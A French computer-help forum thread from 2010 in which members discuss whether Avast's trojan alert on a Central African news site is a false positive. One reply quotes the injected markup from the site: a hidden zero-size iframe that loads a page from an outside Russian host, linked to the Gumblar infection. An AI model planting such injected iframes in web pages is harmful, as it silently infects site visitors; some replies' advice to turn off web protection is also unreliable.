Avast bloque l'accé à mon site infos

Fermé
kazdel Messages postés 235 Date d'inscription mercredi 26 septembre 2007 Statut Membre Dernière intervention 31 mai 2013 - 16 mars 2010 à 14:10
 Philippe - 19 mars 2010 à 15:22
bonjour à tous,voila j'ai un souci avec un lien.je ne peux plus aller sur le lien http://www.centrafrique-presse.com à cause de mon antivirus.a chaque fois ou j'y vais il me dit qu'il a detecté un cheval de troie et il bloqua l'accé au site.et il ne me donne aucun chois pour traiter le problem.pourtant j'ai fais planifier un scan au demarrage mais il n'a rien trouvé.j'ai avast pro version 4.8.merci par avance de votre aide.
A voir également:

8 réponses

georges86400 Messages postés 1750 Date d'inscription jeudi 2 octobre 2008 Statut Membre Dernière intervention 17 février 2013 141
16 mars 2010 à 14:19
Bonjour
je viens de cliquer sur ton lien et j'ai eu le site, mon antivirus bitdefender ne le bloque pas,
Erreur d'Avast ?
0
Bonjour,

Idem avec avast 4.8 version gratuite, il déconnecte le site de suite.

A+Lusche Philippe
0
georges86400 Messages postés 1750 Date d'inscription jeudi 2 octobre 2008 Statut Membre Dernière intervention 17 février 2013 141
16 mars 2010 à 14:27
c'est bien pourquoi je ne veux pas Avast sur mes 3 PC de la maison.
Je viens d'essayer sur l'autre PC avec ESET 4.0 comme antivirus et je me connecte au site aussi
0
Hello,

Il doit faire un amalgame avec Illiframe-F qui est dans sa base VPS, dès que l'on se connecte au site, il spécifie:
Contient le logiciel malveillant Illiframe-E [trj], pas de soucis avec Avira.

Donc moralité entre ce que Georges spécifie et également moi avec Avira, tu peux pour se site désactiver ta protection Bouclier Web.

A+Lusche Philippe
0
pas terrible l'Iframe lol

<noframes><body><iframe frameborder="0" onload="if (!this.src){ this.height='0'; this.src='http://onceworld.ru:8080/index.php'; this.width='0';}" >1258353721co3</iframe>
0
en gros y'a Gumblar au bout :D
0

Vous n’avez pas trouvé la réponse que vous recherchez ?

Posez votre question
kazdel Messages postés 235 Date d'inscription mercredi 26 septembre 2007 Statut Membre Dernière intervention 31 mai 2013 1
17 mars 2010 à 12:56
ok je vous remercie pour votre aide.donc ce que j'ai compris je ne peus rien fair avec avast vous me conseillez de changer.je vais essayer de mettre bitdefender antivirus.encore une fois merci.
0
Bonjour,

Personne ne vous a dit de changer d'antivirus, maintenant il faut également tenir compte du post de Angie concernant Gumblar.

Alors faux positif ou pas ??? perso je n'ai pas les compétences requises,attendez encore un peu pour avoir d'autres nouvelles des intervenants.

A+Lusche Philippe
0
Philippe > Philippe
17 mars 2010 à 16:18
Bonjour,

Avec Nod 32 déconnexion immédiate et cela rejoint le commentaire de Angie, Iframe-B [trj], donc Attention au site nommé.

A+Lusche Philippe
0
kazdel Messages postés 235 Date d'inscription mercredi 26 septembre 2007 Statut Membre Dernière intervention 31 mai 2013 1
17 mars 2010 à 21:34
re excusez moi mais j'ai rien compris a la reponse de angie.
0
Bonjour,

Comme le dit Angie, il y a possibilité d'infection sur ce site, le fait d'ouvrir le site simplement ne dit pas nécessairement que vous serez contaminé (puisque moi même je l'ai ouvert avec AVIRA et que par la suite j'ai fait un scan complet du PC avec AVIRA et Mbam) RAS, par contre le site en lui-même contient le logiciel malveillant, donc des risques d'infection pour vous.

Voici un lien qui vous informera un peu plus sur Gumblar:
https://www.clubic.com/actualite-277286-gumblar-attaque-xss-prend-ampleur.html

Si vous lisez bien, il est spécifié qu'une simple mise à jour de vos logiciels de sécurité vous diminuera les risques d'être infecté.

PS: merci aux membres d'un autre Forum qui ont participé à ce sujet.

Si vous désirez allez sur ce site, il suffit dans vos paramètres de avast de lui indiquer (cliquer droit sur la boule orange, Gestion des agents AVAST et sélectionner l'une des propositions)

A+Lusche Philippe
0
Bonjour Kazdel

Je te répondrais lorsque il y aura moins de bug, marre de me retaper le texte et que celui-ci n'apparait pas.

A+Lusche Philippe
0
Bonjour,

On avance pas à pas dans cette histoire :-)

Voici quelques résultats assez contrariant tout de même.

Alarme de AVAST 4.8 et 5.0 (sous Firefox, Opera et IE)

AVIRA (version gratuite): pas d'alarme sous firefox
AVIRA (version gratuite): Alarme sous Internet Explorer version 8.0
NOD32: Alarme sous Internet explorer, pas testé sous Firefox, le pc avec Nod32 ne m'appartenant pas.

Si George et Angie peuvent faire des tests sous différents navigateur ou tout simplement nous dire ce qu'ils en pensent

A+Lusche Philippe
0